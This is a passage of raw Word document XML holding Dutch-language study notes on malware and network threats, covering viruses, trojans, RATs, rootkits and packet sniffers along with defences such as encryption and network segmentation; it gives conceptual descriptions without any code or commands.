    <w:p w14:paraId="012FEB2E" w14:textId="497F48E1" w:rsidR="00C0433C" w:rsidRDefault="003A023F" w:rsidP="00DB278F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Ze waren ook meestal de originele code van het </w:t>
      </w:r>
      <w:r w:rsidR="00F8216A">
        <w:t>geïnfecteerde</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> programma (anders worden ze misschien ontdekt door een virusscanner). Zo kunnen ze ook de MD5 Hash/CRC terug geven aan een scanner als deze er om vraagt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F182270" w14:textId="77777777" w:rsidR="00C0433C" w:rsidRDefault="00C0433C" w:rsidP="00C0433C"/>
    <w:p w14:paraId="2AD2ABDE" w14:textId="1828F36E" w:rsidR="00C0433C" w:rsidRDefault="00C0433C" w:rsidP="00C0433C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Virussen zijn ook </w:t>
      </w:r>
      <w:r w:rsidRPr="00F8216A">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>polymorf</w:t>
      </w:r>
      <w:r>
        <w:t>, ze hechten telkens een iets andere vorm vanzichzelf aan een object. Op deze manier is de code telkens anders en vallen ze niet hard op.</w:t>
      </w:r>
      <w:r w:rsidR="009F22CD">
        <w:t xml:space="preserve"> Ze doen dit voor bv de whitespacing telkens te veranderen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509B023F" w14:textId="77777777" w:rsidR="00972A6D" w:rsidRDefault="00972A6D" w:rsidP="00972A6D"/>
    <w:p w14:paraId="405D2681" w14:textId="522AD0C4" w:rsidR="00972A6D" w:rsidRDefault="00972A6D" w:rsidP="00972A6D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc453378504"/>
      <w:r>
        <w:t>Trojans / Rootkits</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="4F97C5D2" w14:textId="77777777" w:rsidR="00972A6D" w:rsidRDefault="00972A6D" w:rsidP="00972A6D"/>
    <w:p w14:paraId="0C8CE23B" w14:textId="7F81F9EC" w:rsidR="00972A6D" w:rsidRDefault="00F279B0" w:rsidP="00F279B0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Trojan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385DCE4B" w14:textId="77777777" w:rsidR="00F279B0" w:rsidRDefault="00F279B0" w:rsidP="00F279B0"/>
    <w:p w14:paraId="66B74DEE" w14:textId="77777777" w:rsidR="00F279B0" w:rsidRDefault="00F279B0" w:rsidP="00F279B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Een Trojan focust zich voornamelijk op zijn Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BFDAF5" w14:textId="201CB638" w:rsidR="00F279B0" w:rsidRDefault="00F279B0" w:rsidP="00F279B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Integenstelling tot een virus dat zich focust op zelfreplicatie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438F98BC" w14:textId="71EFD9D0" w:rsidR="00F279B0" w:rsidRDefault="00F279B0" w:rsidP="00F279B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Een Trojan is meestal schijnbaar attractief, maar bevat een onplezierige verrassing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198401AB" w14:textId="3EC3F316" w:rsidR="00F279B0" w:rsidRDefault="00F279B0" w:rsidP="00F279B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Een Trojan bevat statische code die iets anders doet dan de gebruiker verwacht.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521894EC" w14:textId="77777777" w:rsidR="00135B0E" w:rsidRDefault="00135B0E" w:rsidP="00135B0E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00471032" w14:textId="34871676" w:rsidR="00135B0E" w:rsidRDefault="00135B0E" w:rsidP="00135B0E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>RAT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BF60DC" w14:textId="77777777" w:rsidR="000175F6" w:rsidRDefault="000175F6" w:rsidP="000175F6"/>
    <w:p w14:paraId="65F3AE50" w14:textId="19C73113" w:rsidR="000175F6" w:rsidRPr="000175F6" w:rsidRDefault="000175F6" w:rsidP="000175F6">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Application Level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D757F37" w14:textId="77777777" w:rsidR="00135B0E" w:rsidRDefault="00135B0E" w:rsidP="00135B0E"/>
    <w:p w14:paraId="5F9E2C5B" w14:textId="0CA5EBA9" w:rsidR="00135B0E" w:rsidRDefault="00135B0E" w:rsidP="00135B0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= Remote Access Tool = Backdoor Trojan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544E6AF7" w14:textId="0FAD4C88" w:rsidR="00135B0E" w:rsidRDefault="00135B0E" w:rsidP="00135B0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Dit is een Trojan om toegang te verkrijgen tot het systeem van een victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033E1579" w14:textId="398340D2" w:rsidR="00192A89" w:rsidRDefault="00135B0E" w:rsidP="00192A89">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De hacker is nadien in control van het systeem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D86CE7" w14:textId="374D7FCF" w:rsidR="00192A89" w:rsidRDefault="00192A89" w:rsidP="00192A89">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De meeste gewone RAT’s zijn Application-level backdoor Trojans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1796FA62" w14:textId="7ED4BF46" w:rsidR="00192A89" w:rsidRDefault="00192A89" w:rsidP="00192A89">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Op de victim PC wordt een server app geïnstalleerd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090198B9" w14:textId="2092FC88" w:rsidR="00192A89" w:rsidRDefault="00192A89" w:rsidP="00192A89">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De hacker verbindt via deze app met het systeem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0A57D3" w14:textId="77777777" w:rsidR="002331A9" w:rsidRDefault="002331A9" w:rsidP="002331A9"/>
    <w:p w14:paraId="42BAD551" w14:textId="0B441C9D" w:rsidR="00192A89" w:rsidRDefault="002331A9" w:rsidP="002331A9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Rootkit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356814C0" w14:textId="77777777" w:rsidR="009E4062" w:rsidRDefault="009E4062" w:rsidP="009E4062"/>
    <w:p w14:paraId="74F0E7C8" w14:textId="348D1228" w:rsidR="009E4062" w:rsidRPr="009E4062" w:rsidRDefault="009E4062" w:rsidP="009E4062">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Traditionele Rootkits = User Mode Rootkit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD81A9C" w14:textId="77777777" w:rsidR="002331A9" w:rsidRDefault="002331A9" w:rsidP="002331A9"/>
    <w:p w14:paraId="01278C72" w14:textId="4DCCD6E3" w:rsidR="001F4C75" w:rsidRDefault="002331A9" w:rsidP="001F4C75">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Werkt zoals een RAT maar nog meer in het geheim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465CAFEF" w14:textId="6CD64C1F" w:rsidR="001F4C75" w:rsidRDefault="001F4C75" w:rsidP="001F4C75">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= Vermomde backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AD8A5D" w14:textId="70A53227" w:rsidR="002331A9" w:rsidRDefault="002331A9" w:rsidP="002331A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Zal belangrijke executables aanpassen/vervangen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C7EB92" w14:textId="452F3424" w:rsidR="002331A9" w:rsidRDefault="002331A9" w:rsidP="002331A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ifconfig, ls, ps, find, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09455DE1" w14:textId="3EF013C8" w:rsidR="002331A9" w:rsidRDefault="002331A9" w:rsidP="002331A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Maakt een een backdoor om volledig system-access te verkrijgen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415A1176" w14:textId="375CC1FF" w:rsidR="009E4062" w:rsidRDefault="009E4062" w:rsidP="002331A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Verbergt zich diep in het systeem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8EF33F" w14:textId="77777777" w:rsidR="009E4062" w:rsidRDefault="009E4062" w:rsidP="009E4062">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02257693" w14:textId="77777777" w:rsidR="009E4062" w:rsidRDefault="009E4062" w:rsidP="009E4062"/>
    <w:p w14:paraId="4F77C393" w14:textId="1314058C" w:rsidR="009E4062" w:rsidRDefault="009E4062" w:rsidP="009E4062">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Kernal Based Rootkit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3B6DEB" w14:textId="77777777" w:rsidR="009E4062" w:rsidRDefault="009E4062" w:rsidP="009E4062"/>
    <w:p w14:paraId="38F48F50" w14:textId="783BC25E" w:rsidR="009E4062" w:rsidRDefault="009E4062" w:rsidP="009E4062">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vervangen/aanpassen van de kernel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C071EF7" w14:textId="328E14C6" w:rsidR="009E4062" w:rsidRDefault="009E4062" w:rsidP="009E4062">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Opvangen/veranderen van system calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B8D9F3" w14:textId="48AE0AC9" w:rsidR="001040A4" w:rsidRDefault="009E4062" w:rsidP="009E4062">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Moeilijk te detecteren</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCAA044" w14:textId="77777777" w:rsidR="00F545E4" w:rsidRDefault="001040A4" w:rsidP="009F2F1B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r w:rsidR="00F545E4">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="400149F1" wp14:editId="349F7881">
            <wp:extent cx="4828496" cy="4361284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08" cy="43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54F8" w14:textId="4A24ADA6" w:rsidR="00F545E4" w:rsidRDefault="00F545E4" w:rsidP="00F545E4">
      <w:r>
        <w:t>Er zijn ook al Rootkits die zich in de Virtualisation Layer plaatsen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B7A43E" w14:textId="6DD3D087" w:rsidR="00F545E4" w:rsidRDefault="00F545E4" w:rsidP="00F545E4">
      <w:r>
        <w:t>Een format van de HDD helpt dan ook niet meer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C268BF2" w14:textId="2CC9AFAD" w:rsidR="00F545E4" w:rsidRDefault="00F545E4" w:rsidP="00F545E4">
      <w:r>
        <w:t>Voorbeeld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F3B091" w14:textId="76ED4E59" w:rsidR="00F545E4" w:rsidRDefault="00F545E4" w:rsidP="00F545E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Cisco verstuurde een lading devices via een vrachtwachten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAAD655" w14:textId="1D9EC0B7" w:rsidR="00F545E4" w:rsidRDefault="00F545E4" w:rsidP="00F545E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vrachtwagen kwam te laat aan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E39383" w14:textId="6E53E1D4" w:rsidR="00F545E4" w:rsidRDefault="00F545E4" w:rsidP="00F545E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Devices onderzocht -&gt; Extra code in Virtualisation layer gevonden!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FE265E" w14:textId="77777777" w:rsidR="007F55A4" w:rsidRDefault="007F55A4" w:rsidP="007F55A4"/>
    <w:p w14:paraId="5B0ACED8" w14:textId="7B12B824" w:rsidR="009E4062" w:rsidRDefault="007F55A4" w:rsidP="00F545E4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:bookmarkStart w:id="16" w:name="_Toc453378505"/>
      <w:r w:rsidR="001040A4">
        <w:lastRenderedPageBreak/>
        <w:t>Sniffers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="6011AB0A" w14:textId="77777777" w:rsidR="001040A4" w:rsidRDefault="001040A4" w:rsidP="001040A4"/>
    <w:p w14:paraId="20DB819E" w14:textId="2FEFCEF1" w:rsidR="001040A4" w:rsidRDefault="001040A4" w:rsidP="001040A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Onderscheppen netwerkpakketten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9C22CB" w14:textId="1DD6F392" w:rsidR="001040A4" w:rsidRDefault="001040A4" w:rsidP="001040A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Kunnen een legitiem doel hebben</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4AF391" w14:textId="2072226B" w:rsidR="001040A4" w:rsidRDefault="001040A4" w:rsidP="001040A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Netwerkanalyse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086EDF1D" w14:textId="57F1AEE9" w:rsidR="001040A4" w:rsidRDefault="001040A4" w:rsidP="001040A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sniffers zetten de NIC in promiscuous mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6079BFB3" w14:textId="7FD61C83" w:rsidR="001040A4" w:rsidRDefault="001040A4" w:rsidP="001040A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>NIC vangt normaal alleen verkeer op dat voor hem bedoeld is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BC1749" w14:textId="5410DB5A" w:rsidR="001040A4" w:rsidRDefault="001040A4" w:rsidP="001040A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>In Promiscuous mode vangt hij alles op</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559F3644" w14:textId="6016A9B7" w:rsidR="001040A4" w:rsidRDefault="001040A4" w:rsidP="001040A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sniffers werken passief</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD0032C" w14:textId="5480F280" w:rsidR="001040A4" w:rsidRDefault="008D5B70" w:rsidP="001040A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De hacker wil meestal alleen de eerste 200-300 bytes van een pakket hebben (username/password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6967F723" w14:textId="10E2D5D2" w:rsidR="008D5B70" w:rsidRDefault="00E03606" w:rsidP="001040A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Gebruik SSL en SSH!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630C0DFE" w14:textId="6C9FB010" w:rsidR="005B5DA6" w:rsidRDefault="005B5DA6" w:rsidP="001040A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Een sniffer plaats je op een strategisch punt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6081BF95" w14:textId="09F0FD32" w:rsidR="005B5DA6" w:rsidRDefault="005B5DA6" w:rsidP="005B5DA6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vlakbij een machine met veel paswoorden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13ADB477" w14:textId="6B4E07EE" w:rsidR="005B5DA6" w:rsidRDefault="005B5DA6" w:rsidP="005B5DA6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vlakbij de gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBFAD13" w14:textId="01353830" w:rsidR="009E4062" w:rsidRDefault="002D2E65" w:rsidP="009E4062">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Snifferaanvallen afslaan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BBBE33" w14:textId="6BC15EE7" w:rsidR="002D2E65" w:rsidRDefault="002D2E65" w:rsidP="002D2E65">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sniffers detecteren en elimineren</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015665DE" w14:textId="6A8E9D35" w:rsidR="002D2E65" w:rsidRDefault="002D2E65" w:rsidP="002D2E65">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uitkijken naar NIC die promiscuous mode staat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B9460D" w14:textId="62D6E9CE" w:rsidR="002D2E65" w:rsidRDefault="002D2E65" w:rsidP="002D2E65">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bereke</w:t>
      </w:r>
      <w:r w:rsidR="00041967">
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>en van Hash op het systeem</w:t>
      </w:r>
      <w:r w:rsidR="00C94DD0">
        <w:t xml:space="preserve"> en checken!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C31F6DC" w14:textId="3F76EE4E" w:rsidR="002D2E65" w:rsidRDefault="00F373EB" w:rsidP="002D2E65">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Programma gebruiken </w:t>
      </w:r>
      <w:r w:rsidR="00463D92">
        <w:t>die</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:r w:rsidR="002D2E65">
        <w:t>netwerk topologie in het oog houdt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C98546" w14:textId="7AD77150" w:rsidR="002D2E65" w:rsidRDefault="002D2E65" w:rsidP="002D2E65">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Gegevens beschermen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3622FA88" w14:textId="3CE7D319" w:rsidR="002D2E65" w:rsidRDefault="002D2E65" w:rsidP="002D2E65">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Veilige topologie = Netwerksegmentatie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F1FF9B" w14:textId="49ECB0ED" w:rsidR="002D2E65" w:rsidRDefault="002D2E65" w:rsidP="002D2E65">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Switches, routers, bridges, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B2A248" w14:textId="434215C1" w:rsidR="007B6972" w:rsidRDefault="007B6972" w:rsidP="002D2E65">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Maakt het bereik van de sniffer kleiner!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249A2E3D" w14:textId="444AEB5B" w:rsidR="002D2E65" w:rsidRDefault="002D2E65" w:rsidP="002D2E65">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Versleutelde sessies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184C5AFA" w14:textId="0933E74A" w:rsidR="002D2E65" w:rsidRDefault="002D2E65" w:rsidP="002D2E65">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Gegevens encrypteren!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E72AB6" w14:textId="77777777" w:rsidR="00DD7063" w:rsidRDefault="00DD7063" w:rsidP="00DD7063"/>
    <w:p w14:paraId="1C1A8586" w14:textId="40812991" w:rsidR="00DD7063" w:rsidRDefault="00DD7063" w:rsidP="00DD7063">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362468E2" w14:textId="77777777" w:rsidR="00DD7063" w:rsidRDefault="00DD7063" w:rsidP="00DD7063"/>
    <w:p w14:paraId="76FBD004" w14:textId="66B1BDFC" w:rsidR="009E4062" w:rsidRDefault="00520FBD" w:rsidP="00520FBD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>TCP/IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD2554C" w14:textId="77777777" w:rsidR="00520FBD" w:rsidRDefault="00520FBD" w:rsidP="00520FBD"/>
    <w:p w14:paraId="5F1F1BE6" w14:textId="164A630C" w:rsidR="00520FBD" w:rsidRDefault="00520FBD" w:rsidP="00520FBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Een TCP/IP connectie is gedefinieerd door 4 parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2466C96F" w14:textId="5D73B0CD" w:rsidR="00520FBD" w:rsidRDefault="00520FBD" w:rsidP="00520FBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Source socket (IP/poort)</w:t>
      </w:r>
    </w:p>
